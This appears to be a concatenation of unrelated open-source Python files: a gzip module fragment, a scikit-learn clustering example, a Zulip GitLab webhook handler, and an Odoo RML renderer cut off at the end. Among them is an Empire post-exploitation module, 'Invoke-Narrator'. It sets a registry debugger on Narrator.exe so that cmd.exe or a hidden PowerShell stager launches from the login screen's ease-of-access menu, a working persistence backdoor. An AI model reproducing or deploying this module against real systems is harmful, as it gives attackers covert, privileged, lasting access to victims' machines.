self.read(count % 1024)
return self.offset
def readline(self, size=-1):
if size < 0:
# Shortcut common case - newline found in buffer.
offset = self.offset - self.extrastart
i = self.extrabuf.find('\n', offset) + 1
if i > 0:
self.extrasize -= i - offset
self.offset += i - offset
return self.extrabuf[offset: i]
size = sys.maxint
readsize = self.min_readsize
else:
readsize = size
bufs = []
while size != 0:
c = self.read(readsize)
i = c.find('\n')
# We set i=size to break out of the loop under two
# conditions: 1) there's no newline, and the chunk is
# larger than size, or 2) there is a newline, but the
# resulting line would be longer than 'size'.
if (size <= i) or (i == -1 and len(c) > size):
i = size - 1
if i >= 0 or c == '':
bufs.append(c[:i + 1]) # Add portion of last chunk
self._unread(c[i + 1:]) # Push back rest of chunk
break
# Append chunk to list, decrease 'size',
bufs.append(c)
size = size - len(c)
readsize = min(size, readsize * 2)
if readsize > self.min_readsize:
self.min_readsize = min(readsize, self.min_readsize * 2, 512)
return ''.join(bufs) # Return resulting line
def _test():
# Act like gzip; with -d, act like gunzip.
# The input file is not deleted, however, nor are any other gzip
# options or features supported.
args = sys.argv[1:]
decompress = args and args[0] == "-d"
if decompress:
args = args[1:]
if not args:
args = ["-"]
for arg in args:
if decompress:
if arg == "-":
f = GzipFile(filename="", mode="rb", fileobj=sys.stdin)
g = sys.stdout
else:
if arg[-3:] != ".gz":
print "filename doesn't end in .gz:", repr(arg)
continue
f = open(arg, "rb")
g = __builtin__.open(arg[:-3], "wb")
else:
if arg == "-":
f = sys.stdin
g = GzipFile(filename="", mode="wb", fileobj=sys.stdout)
else:
f = __builtin__.open(arg, "rb")
g = open(arg + ".gz", "wb")
while True:
chunk = f.read(1024)
if not chunk:
break
g.write(chunk)
if g is not sys.stdout:
g.close()
if f is not sys.stdin:
f.close()
if __name__ == '__main__':
_test()
| apache-2.0 |
pasv/Empire | lib/modules/persistence/debugger/narrator.py | 20 | 5297 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Narrator',
'Author': ['@harmj0y'],
'Description': ("Sets the debugger for the text narrator (Narrator.exe) to be cmd.exe, "
"another binary of your choice, or a listern stager. This can be launched from "
"the ease-of-access center."),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [ ]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:Software\Microsoft\Network\debug'
},
'Cleanup' : {
'Description' : 'Switch. Disable the Narrator.exe debugger.',
'Required' : False,
'Value' : ''
},
'Binary' : {
'Description' : 'Binary to set for the debugger.',
'Required' : False,
'Value' : 'C:\Windows\System32\cmd.exe'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# management options
cleanup = self.options['Cleanup']['Value']
binary = self.options['Binary']['Value']
listenerName = self.options['Listener']['Value']
# storage options
regPath = self.options['RegPath']['Value']
statusMsg = ""
locationString = ""
if cleanup.lower() == 'true':
# the registry command to disable the debugger for Narrator.exe
script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe';'Narrator.exe debugger removed.'"
return script
if listenerName != '':
# if there's a listener specified, generate a stager and store it
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner
launcher = self.mainMenu.stagers.generate_launcher(listenerName)
encScript = launcher.split(" ")[-1]
# statusMsg += "using listener " + listenerName
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath + "."
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'Narrator.exe debugger set to trigger stager for listener "+listenerName+"'"
else:
# the registry command to set the debugger for Narrator.exe to be the binary path specified
script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe' -Name Debugger -Value '"+binary+"';'Narrator.exe debugger set to "+binary+"'"
return script
| bsd-3-clause |
appapantula/scikit-learn | examples/cluster/plot_agglomerative_clustering_metrics.py | 402 | 4492 | """
Agglomerative clustering with different metrics
===============================================
Demonstrates the effect of different metrics on the hierarchical clustering.
The example is engineered to show the effect of the choice of different
metrics. It is applied to waveforms, which can be seen as
high-dimensional vector. Indeed, the difference between metrics is
usually more pronounced in high dimension (in particular for euclidean
and cityblock).
We generate data from three groups of waveforms. Two of the waveforms
(waveform 1 and waveform 2) are proportional one to the other. The cosine
distance is invariant to a scaling of the data, as a result, it cannot
distinguish these two waveforms. Thus even with no noise, clustering
using this distance will not separate out waveform 1 and 2.
We add observation noise to these waveforms. We generate very sparse
noise: only 6% of the time points contain noise. As a result, the
l1 norm of this noise (ie "cityblock" distance) is much smaller than it's
l2 norm ("euclidean" distance). This can be seen on the inter-class
distance matrices: the values on the diagonal, that characterize the
spread of the class, are much bigger for the Euclidean distance than for
the cityblock distance.
When we apply clustering to the data, we find that the clustering
reflects what was in the distance matrices. Indeed, for the Euclidean
distance, the classes are ill-separated because of the noise, and thus
the clustering does not separate the waveforms. For the cityblock
distance, the separation is good and the waveform classes are recovered.
Finally, the cosine distance does not separate at all waveform 1 and 2,
thus the clustering puts them in the same cluster.
"""
# Author: Gael Varoquaux
# License: BSD 3-Clause or CC-0
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import pairwise_distances
np.random.seed(0)
# Generate waveform data
n_features = 2000
t = np.pi * np.linspace(0, 1, n_features)
def sqr(x):
return np.sign(np.cos(x))
X = list()
y = list()
for i, (phi, a) in enumerate([(.5, .15), (.5, .6), (.3, .2)]):
for _ in range(30):
phase_noise = .01 * np.random.normal()
amplitude_noise = .04 * np.random.normal()
additional_noise = 1 - 2 * np.random.rand(n_features)
# Make the noise sparse
additional_noise[np.abs(additional_noise) < .997] = 0
X.append(12 * ((a + amplitude_noise)
* (sqr(6 * (t + phi + phase_noise)))
+ additional_noise))
y.append(i)
X = np.array(X)
y = np.array(y)
n_clusters = 3
labels = ('Waveform 1', 'Waveform 2', 'Waveform 3')
# Plot the ground-truth labelling
plt.figure()
plt.axes([0, 0, 1, 1])
for l, c, n in zip(range(n_clusters), 'rgb',
labels):
lines = plt.plot(X[y == l].T, c=c, alpha=.5)
lines[0].set_label(n)
plt.legend(loc='best')
plt.axis('tight')
plt.axis('off')
plt.suptitle("Ground truth", size=20)
# Plot the distances
for index, metric in enumerate(["cosine", "euclidean", "cityblock"]):
avg_dist = np.zeros((n_clusters, n_clusters))
plt.figure(figsize=(5, 4.5))
for i in range(n_clusters):
for j in range(n_clusters):
avg_dist[i, j] = pairwise_distances(X[y == i], X[y == j],
metric=metric).mean()
avg_dist /= avg_dist.max()
for i in range(n_clusters):
for j in range(n_clusters):
plt.text(i, j, '%5.3f' % avg_dist[i, j],
verticalalignment='center',
horizontalalignment='center')
plt.imshow(avg_dist, interpolation='nearest', cmap=plt.cm.gnuplot2,
vmin=0)
plt.xticks(range(n_clusters), labels, rotation=45)
plt.yticks(range(n_clusters), labels)
plt.colorbar()
plt.suptitle("Interclass %s distances" % metric, size=18)
plt.tight_layout()
# Plot clustering results
for index, metric in enumerate(["cosine", "euclidean", "cityblock"]):
model = AgglomerativeClustering(n_clusters=n_clusters,
linkage="average", affinity=metric)
model.fit(X)
plt.figure()
plt.axes([0, 0, 1, 1])
for l, c in zip(np.arange(model.n_clusters), 'rgbk'):
plt.plot(X[model.labels_ == l].T, c=c, alpha=.5)
plt.axis('tight')
plt.axis('off')
plt.suptitle("AgglomerativeClustering(affinity=%s)" % metric, size=20)
plt.show()
| bsd-3-clause |
vikas-parashar/zulip | zerver/views/webhooks/gitlab.py | 6 | 13187 | from __future__ import absolute_import
from functools import partial
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success
from zerver.decorator import api_key_only_webhook_view, REQ, has_request_variables
from zerver.lib.webhooks.git import get_push_commits_event_message, EMPTY_SHA,\
get_remove_branch_event_message, get_pull_request_event_message,\
get_issue_event_message, SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE,\
get_commits_comment_action_message, get_push_tag_event_message
from zerver.models import Client, UserProfile
from django.http import HttpRequest, HttpResponse
from six import text_type
from typing import Dict, Any, Iterable, Optional
class UnknownEventType(Exception):
pass
def get_push_event_body(payload):
# type: (Dict[str, Any]) -> text_type
if payload.get('after') == EMPTY_SHA:
return get_remove_branch_event_body(payload)
return get_normal_push_event_body(payload)
def get_normal_push_event_body(payload):
# type: (Dict[str, Any]) -> text_type
compare_url = u'{}/compare/{}...{}'.format(
get_repository_homepage(payload),
payload['before'],
payload['after']
)
commits = [
{
'sha': commit.get('id'),
'message': commit.get('message'),
'url': commit.get('url')
}
for commit in payload.get('commits')
]
return get_push_commits_event_message(
get_user_name(payload),
compare_url,
get_branch_name(payload),
commits
)
def get_remove_branch_event_body(payload):
# type: (Dict[str, Any]) -> text_type
return get_remove_branch_event_message(
get_user_name(payload),
get_branch_name(payload)
)
def get_tag_push_event_body(payload):
# type: (Dict[str, Any]) -> text_type
return get_push_tag_event_message(
get_user_name(payload),
get_tag_name(payload),
action="pushed" if payload.get('checkout_sha') else "removed"
)
def get_issue_created_event_body(payload):
# type: (Dict[str, Any]) -> text_type
return get_issue_event_message(
get_issue_user_name(payload),
'created',
get_object_url(payload),
payload.get('object_attributes').get('iid'),
payload.get('object_attributes').get('description'),
get_objects_assignee(payload)
)
def get_issue_event_body(payload, action):
# type: (Dict[str, Any], text_type) -> text_type
return get_issue_event_message(
get_issue_user_name(payload),
action,
get_object_url(payload),
payload.get('object_attributes').get('iid'),
)
def get_merge_request_updated_event_body(payload):
# type: (Dict[str, Any]) -> text_type
if payload.get('object_attributes').get('oldrev'):
return get_merge_request_event_body(payload, "added commit(s) to")
return get_merge_request_open_or_updated_body(payload, "updated")
def get_merge_request_event_body(payload, action):
# type: (Dict[str, Any], text_type) -> text_type
pull_request = payload.get('object_attributes')
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
pull_request.get('url'),
pull_request.get('iid'),
type='MR',
)
def get_merge_request_open_or_updated_body(payload, action):
# type: (Dict[str, Any], text_type) -> text_type
pull_request = payload.get('object_attributes')
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
pull_request.get('url'),
pull_request.get('iid'),
pull_request.get('source_branch'),
pull_request.get('target_branch'),
pull_request.get('description'),
get_objects_assignee(payload),
type='MR',
)
def get_objects_assignee(payload):
# type: (Dict[str, Any]) -> text_type
assignee_object = payload.get('assignee')
if assignee_object:
return assignee_object.get('name')
def get_commented_commit_event_body(payload):
# type: (Dict[str, Any]) -> text_type
comment = payload.get('object_attributes')
action = u'[commented]({})'.format(comment['url'])
return get_commits_comment_action_message(
get_issue_user_name(payload),
action,
payload.get('commit').get('url'),
payload.get('commit').get('id'),
comment['note'],
)
def get_commented_merge_request_event_body(payload):
# type: (Dict[str, Any]) -> text_type
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/merge_requests/{}'.format(
payload.get('project').get('web_url'),
payload.get('merge_request').get('iid')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('merge_request').get('iid'),
message=comment['note'],
type='MR'
)
def get_commented_issue_event_body(payload):
# type: (Dict[str, Any]) -> text_type
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/issues/{}'.format(
payload.get('project').get('web_url'),
payload.get('issue').get('iid')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('issue').get('iid'),
message=comment['note'],
type='Issue'
)
def get_commented_snippet_event_body(payload):
# type: (Dict[str, Any]) -> text_type
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/snippets/{}'.format(
payload.get('project').get('web_url'),
payload.get('snippet').get('id')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('snippet').get('id'),
message=comment['note'],
type='Snippet'
)
def get_wiki_page_event_body(payload, action):
# type: (Dict[str, Any], text_type) -> text_type
return u"{} {} [Wiki Page \"{}\"]({}).".format(
get_issue_user_name(payload),
action,
payload.get('object_attributes').get('title'),
payload.get('object_attributes').get('url'),
)
def get_build_hook_event_body(payload):
# type: (Dict[str, Any]) -> text_type
build_status = payload.get('build_status')
if build_status == 'created':
action = 'was created'
elif build_status == 'running':
action = 'started'
else:
action = 'changed status to {}'.format(build_status)
return u"Build {} from {} stage {}.".format(
payload.get('build_name'),
payload.get('build_stage'),
action
)
def get_pipeline_event_body(payload):
# type: (Dict[str, Any]) -> text_type
pipeline_status = payload.get('object_attributes').get('status')
if pipeline_status == 'pending':
action = 'was created'
elif pipeline_status == 'running':
action = 'started'
else:
action = 'changed status to {}'.format(pipeline_status)
builds_status = u""
for build in payload.get('builds'):
builds_status += u"* {} - {}\n".format(build.get('name'), build.get('status'))
return u"Pipeline {} with build(s):\n{}.".format(action, builds_status[:-1])
def get_repo_name(payload):
# type: (Dict[str, Any]) -> text_type
return payload['project']['name']
def get_user_name(payload):
# type: (Dict[str, Any]) -> text_type
return payload['user_name']
def get_issue_user_name(payload):
# type: (Dict[str, Any]) -> text_type
return payload['user']['name']
def get_repository_homepage(payload):
# type: (Dict[str, Any]) -> text_type
return payload['repository']['homepage']
def get_branch_name(payload):
# type: (Dict[str, Any]) -> text_type
return payload['ref'].replace('refs/heads/', '')
def get_tag_name(payload):
# type: (Dict[str, Any]) -> text_type
return payload['ref'].replace('refs/tags/', '')
def get_object_iid(payload):
# type: (Dict[str, Any]) -> text_type
return payload['object_attributes']['iid']
def get_object_url(payload):
# type: (Dict[str, Any]) -> text_type
return payload['object_attributes']['url']
EVENT_FUNCTION_MAPPER = {
'Push Hook': get_push_event_body,
'Tag Push Hook': get_tag_push_event_body,
'Issue Hook open': get_issue_created_event_body,
'Issue Hook close': partial(get_issue_event_body, action='closed'),
'Issue Hook reopen': partial(get_issue_event_body, action='reopened'),
'Issue Hook update': partial(get_issue_event_body, action='updated'),
'Note Hook Commit': get_commented_commit_event_body,
'Note Hook MergeRequest': get_commented_merge_request_event_body,
'Note Hook Issue': get_commented_issue_event_body,
'Note Hook Snippet': get_commented_snippet_event_body,
'Merge Request Hook open': partial(get_merge_request_open_or_updated_body, action='created'),
'Merge Request Hook update': get_merge_request_updated_event_body,
'Merge Request Hook merge': partial(get_merge_request_event_body, action='merged'),
'Merge Request Hook close': partial(get_merge_request_event_body, action='closed'),
'Wiki Page Hook create': partial(get_wiki_page_event_body, action='created'),
'Wiki Page Hook update': partial(get_wiki_page_event_body, action='updated'),
'Build Hook': get_build_hook_event_body,
'Pipeline Hook': get_pipeline_event_body,
}
@api_key_only_webhook_view("Gitlab")
@has_request_variables
def api_gitlab_webhook(request, user_profile, client,
stream=REQ(default='gitlab'),
payload=REQ(argument_type='body')):
# type: (HttpRequest, UserProfile, Client, text_type, Dict[str, Any]) -> HttpResponse
event = get_event(request, payload)
body = get_body_based_on_event(event)(payload)
subject = get_subject_based_on_event(event, payload)
check_send_message(user_profile, client, 'stream', [stream], subject, body)
return json_success()
def get_body_based_on_event(event):
# type: (str) -> Any
return EVENT_FUNCTION_MAPPER[event]
def get_subject_based_on_event(event, payload):
# type: (str, Dict[str, Any]) -> text_type
if event == 'Push Hook':
return u"{} / {}".format(get_repo_name(payload), get_branch_name(payload))
elif event == 'Build Hook':
return u"{} / {}".format(payload.get('repository').get('name'), get_branch_name(payload))
elif event == 'Pipeline Hook':
return u"{} / {}".format(
get_repo_name(payload),
payload.get('object_attributes').get('ref').replace('refs/heads/', ''))
elif event.startswith('Merge Request Hook'):
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='MR',
id=payload.get('object_attributes').get('iid'),
title=payload.get('object_attributes').get('title')
)
elif event.startswith('Issue Hook'):
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Issue',
id=payload.get('object_attributes').get('iid'),
title=payload.get('object_attributes').get('title')
)
elif event == 'Note Hook Issue':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Issue',
id=payload.get('issue').get('iid'),
title=payload.get('issue').get('title')
)
elif event == 'Note Hook MergeRequest':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='MR',
id=payload.get('merge_request').get('iid'),
title=payload.get('merge_request').get('title')
)
elif event == 'Note Hook Snippet':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Snippet',
id=payload.get('snippet').get('id'),
title=payload.get('snippet').get('title')
)
return get_repo_name(payload)
def get_event(request, payload):
# type: (HttpRequest, Dict[str, Any]) -> str
event = request.META['HTTP_X_GITLAB_EVENT']
if event == 'Issue Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
elif event == 'Note Hook':
action = payload.get('object_attributes').get('noteable_type')
event = "{} {}".format(event, action)
elif event == 'Merge Request Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
elif event == 'Wiki Page Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
if event in list(EVENT_FUNCTION_MAPPER.keys()):
return event
raise UnknownEventType(u'Event {} is unknown and cannot be handled'.format(event))
| apache-2.0 |
OpusVL/odoo | openerp/report/render/rml2txt/rml2txt.py | 8 | 16392 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009, P. Christeas, Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sys
import StringIO
from lxml import etree
import utils
Font_size= 10.0
def verbose(text):
sys.stderr.write(text+"\n")
class textbox(object):
"""A box containing plain text.
It can have an offset, in chars.
Lines can be either text strings, or textbox'es, recursively.
"""
def __init__(self,x=0, y=0):
self.posx = x
self.posy = y
self.lines = []
self.curline = ''
self.endspace = False
def newline(self):
if isinstance(self.curline, textbox):
self.lines.extend(self.curline.renderlines())
else:
self.lines.append(self.curline)
self.curline = ''
def fline(self):
if isinstance(self.curline, textbox):
self.lines.extend(self.curline.renderlines())
elif len(self.curline):
self.lines.append(self.curline)
self.curline = ''
def appendtxt(self,txt):
"""Append some text to the current line.
Mimic the HTML behaviour, where all whitespace evaluates to
a single space """
if not txt:
return
bs = es = False
if txt[0].isspace():
bs = True
if txt[len(txt)-1].isspace():
es = True
if bs and not self.endspace:
self.curline += " "
self.curline += txt.strip().replace("\n"," ").replace("\t"," ")
if es:
self.curline += " "
self.endspace = es
def rendertxt(self,xoffset=0):
result = ''
lineoff = ""
for i in range(self.posy):
result +="\n"
for i in range(self.posx+xoffset):
lineoff+=" "
for l in self.lines:
result+= lineoff+ l +"\n"
return result
def renderlines(self,pad=0):
"""Returns a list of lines, from the current object
pad: all lines must be at least pad characters.
"""
result = []
lineoff = ""
for i in range(self.posx):
lineoff+=" "
for l in self.lines:
lpad = ""
if pad and len(l) < pad :
for i in range(pad - len(l)):
lpad += " "
#elif pad and len(l) > pad ?
result.append(lineoff+ l+lpad)
return result
def haplines(self,arr,offset,cc= ''):
""" Horizontaly append lines
"""
while len(self.lines) < len(arr):
self.lines.append("")
for i in range(len(self.lines)):
while len(self.lines[i]) < offset:
self.lines[i] += " "
for i in range(len(arr)):
self.lines[i] += cc +arr[i]
class _flowable(object):
def __init__(self, template, doc,localcontext):
self._tags = {
'1title': self._tag_title,
'1spacer': self._tag_spacer,
'para': self._tag_para,
'font': self._tag_font,
'section': self._tag_section,
'1nextFrame': self._tag_next_frame,
'blockTable': self._tag_table,
'1pageBreak': self._tag_page_break,
'1setNextTemplate': self._tag_next_template,
}
self.template = template
self.doc = doc
self.localcontext = localcontext
self.nitags = []
self.tbox = None
def warn_nitag(self,tag):
if tag not in self.nitags:
verbose("Unknown tag \"%s\", please implement it." % tag)
self.nitags.append(tag)
def _tag_page_break(self, node):
return "\f"
def _tag_next_template(self, node):
return ''
def _tag_next_frame(self, node):
result=self.template.frame_stop()
result+='\n'
result+=self.template.frame_start()
return result
def _tag_title(self, node):
node.tagName='h1'
return node.toxml()
def _tag_spacer(self, node):
length = 1+int(utils.unit_get(node.get('length')))/35
return "\n"*length
def _tag_table(self, node):
self.tb.fline()
saved_tb = self.tb
self.tb = None
sizes = None
if node.get('colWidths'):
sizes = map(lambda x: utils.unit_get(x), node.get('colWidths').split(','))
trs = []
for n in utils._child_get(node,self):
if n.tag == 'tr':
tds = []
for m in utils._child_get(n,self):
if m.tag == 'td':
self.tb = textbox()
self.rec_render_cnodes(m)
tds.append(self.tb)
self.tb = None
if len(tds):
trs.append(tds)
if not sizes:
verbose("computing table sizes..")
for tds in trs:
trt = textbox()
off=0
for i in range(len(tds)):
p = int(sizes[i]/Font_size)
trl = tds[i].renderlines(pad=p)
trt.haplines(trl,off)
off += sizes[i]/Font_size
saved_tb.curline = trt
saved_tb.fline()
self.tb = saved_tb
return
def _tag_para(self, node):
#TODO: styles
self.rec_render_cnodes(node)
self.tb.newline()
def _tag_section(self, node):
#TODO: styles
self.rec_render_cnodes(node)
self.tb.newline()
def _tag_font(self, node):
"""We do ignore fonts.."""
self.rec_render_cnodes(node)
def rec_render_cnodes(self,node):
self.tb.appendtxt(utils._process_text(self, node.text or ''))
for n in utils._child_get(node,self):
self.rec_render(n)
self.tb.appendtxt(utils._process_text(self, node.tail or ''))
def rec_render(self,node):
""" Recursive render: fill outarr with text of current node
"""
if node.tag is not None:
if node.tag in self._tags:
self._tags[node.tag](node)
else:
self.warn_nitag(node.tag)
def render(self, node):
self.tb= textbox()
#result = self.template.start()
#result += self.template.frame_start()
self.rec_render_cnodes(node)
#result += self.template.frame_stop()
#result += self.template.end()
result = self.tb.rendertxt()
del self.tb
return result
class _rml_tmpl_tag(object):
def __init__(self, *args):
pass
def tag_start(self):
return ''
def tag_end(self):
return False
def tag_stop(self):
return ''
def tag_mergeable(self):
return True
class _rml_tmpl_frame(_rml_tmpl_tag):
def __init__(self, posx, width):
self.width = width
self.posx = posx
def tag_start(self):
return "frame start"
def tag_end(self):
return True
def tag_stop(self):
return "frame stop"
def tag_mergeable(self):
return False
# An awfull workaround since I don't really understand the semantic behind merge.
def merge(self, frame):
pass
class _rml_tmpl_draw_string(_rml_tmpl_tag):
def __init__(self, node, style):
self.posx = utils.unit_get(node.get('x'))
self.posy = utils.unit_get(node.get('y'))
aligns = {
'drawString': 'left',
'drawRightString': 'right',
'drawCentredString': 'center'
}
align = aligns[node.localName]
self.pos = [(self.posx, self.posy, align, utils.text_get(node), style.get('td'), style.font_size_get('td'))]
def tag_start(self):
return "draw string \"%s\" @(%d,%d)..\n" %("txt",self.posx,self.posy)
def merge(self, ds):
self.pos+=ds.pos
class _rml_tmpl_draw_lines(_rml_tmpl_tag):
def __init__(self, node, style):
coord = [utils.unit_get(x) for x in utils.text_get(node).split(' ')]
self.ok = False
self.posx = coord[0]
self.posy = coord[1]
self.width = coord[2]-coord[0]
self.ok = coord[1]==coord[3]
self.style = style
self.style = style.get('hr')
def tag_start(self):
return "draw lines..\n"
class _rml_stylesheet(object):
def __init__(self, stylesheet, doc):
self.doc = doc
self.attrs = {}
self._tags = {
'fontSize': lambda x: ('font-size',str(utils.unit_get(x))+'px'),
'alignment': lambda x: ('text-align',str(x))
}
result = ''
for ps in stylesheet.findall('paraStyle'):
attr = {}
attrs = ps.attributes
for i in range(attrs.length):
name = attrs.item(i).localName
attr[name] = ps.get(name)
attrs = []
for a in attr:
if a in self._tags:
attrs.append("%s:%s" % self._tags[a](attr[a]))
if len(attrs):
result += "p."+attr['name']+" {"+'; '.join(attrs)+"}\n"
self.result = result
def render(self):
return ''
class _rml_draw_style(object):
def __init__(self):
self.style = {}
self._styles = {
'fill': lambda x: {'td': {'color':x.get('color')}},
'setFont': lambda x: {'td': {'font-size':x.get('size')+'px'}},
'stroke': lambda x: {'hr': {'color':x.get('color')}},
}
def update(self, node):
if node.localName in self._styles:
result = self._styles[node.localName](node)
for key in result:
if key in self.style:
self.style[key].update(result[key])
else:
self.style[key] = result[key]
def font_size_get(self,tag):
size = utils.unit_get(self.style.get('td', {}).get('font-size','16'))
return size
def get(self,tag):
if not tag in self.style:
return ""
return ';'.join(['%s:%s' % (x[0],x[1]) for x in self.style[tag].items()])
class _rml_template(object):
def __init__(self, localcontext, out, node, doc, images=None, path='.', title=None):
self.localcontext = localcontext
self.frame_pos = -1
self.frames = []
self.template_order = []
self.page_template = {}
self.loop = 0
self._tags = {
'drawString': _rml_tmpl_draw_string,
'drawRightString': _rml_tmpl_draw_string,
'drawCentredString': _rml_tmpl_draw_string,
'lines': _rml_tmpl_draw_lines
}
self.style = _rml_draw_style()
for pt in node.findall('pageTemplate'):
frames = {}
id = pt.get('id')
self.template_order.append(id)
for tmpl in pt.findall('frame'):
posy = int(utils.unit_get(tmpl.get('y1'))) #+utils.unit_get(tmpl.get('height')))
posx = int(utils.unit_get(tmpl.get('x1')))
frames[(posy,posx,tmpl.get('id'))] = _rml_tmpl_frame(posx, utils.unit_get(tmpl.get('width')))
for tmpl in node.findall('pageGraphics'):
for n in tmpl.getchildren():
if n.nodeType==n.ELEMENT_NODE:
if n.localName in self._tags:
t = self._tags[n.localName](n, self.style)
frames[(t.posy,t.posx,n.localName)] = t
else:
self.style.update(n)
keys = frames.keys()
keys.sort()
keys.reverse()
self.page_template[id] = []
for key in range(len(keys)):
if key>0 and keys[key-1][0] == keys[key][0]:
if type(self.page_template[id][-1]) == type(frames[keys[key]]):
if self.page_template[id][-1].tag_mergeable():
self.page_template[id][-1].merge(frames[keys[key]])
continue
self.page_template[id].append(frames[keys[key]])
self.template = self.template_order[0]
def _get_style(self):
return self.style
def set_next_template(self):
self.template = self.template_order[(self.template_order.index(name)+1) % self.template_order]
self.frame_pos = -1
def set_template(self, name):
self.template = name
self.frame_pos = -1
def frame_start(self):
result = ''
frames = self.page_template[self.template]
ok = True
while ok:
self.frame_pos += 1
if self.frame_pos>=len(frames):
self.frame_pos=0
self.loop=1
ok = False
continue
f = frames[self.frame_pos]
result+=f.tag_start()
ok = not f.tag_end()
if ok:
result+=f.tag_stop()
return result
def frame_stop(self):
frames = self.page_template[self.template]
f = frames[self.frame_pos]
result=f.tag_stop()
return result
def start(self):
return ''
def end(self):
return "template end\n"
class _rml_doc(object):
def __init__(self, node, localcontext=None, images=None, path='.', title=None):
self.localcontext = {} if localcontext is None else localcontext
self.etree = node
self.filename = self.etree.get('filename')
self.result = ''
def render(self, out):
#el = self.etree.findall('docinit')
#if el:
#self.docinit(el)
#el = self.etree.findall('stylesheet')
#self.styles = _rml_styles(el,self.localcontext)
el = self.etree.findall('template')
self.result =""
if len(el):
pt_obj = _rml_template(self.localcontext, out, el[0], self)
stories = utils._child_get(self.etree, self, 'story')
for story in stories:
if self.result:
self.result += '\f'
f = _flowable(pt_obj,story,self.localcontext)
self.result += f.render(story)
del f
else:
self.result = "<cannot render w/o template>"
self.result += '\n'
out.write( self.result)
def parseNode(rml, localcontext=None,fout=None, images=None, path='.',title=None):
node = etree.XML(rml)
r = _rml_doc(node, localcontext, images, path, title=title)
fp = StringIO.StringIO()
r.render(fp)
return fp.getvalue()
def parseString(rml, localcontext=None,fout=None, images=None, path='.',title=None):
node = etree.XML(rml)
r = _rml_doc(node, localcontext, images, path, title=title)
if fout:
fp = file(fout,'wb')
r.render(fp)
fp.close()
return fout
else:
fp = StringIO.StringIO()
r.render(fp)
return fp.getvalue()
def trml2pdf_help():
print 'Usage: rml2txt input.rml >output.html'
print 'Render the standard input (RML) and output an TXT file'
sys.exit(0)
if __name__=="__main__":
if len(sys.argv)>1:
if sys.argv[1]=='--help':
trml2pdf_help()
print parseString(file(sys.argv[1], 'r').read()).encode('iso8859-7')
else:
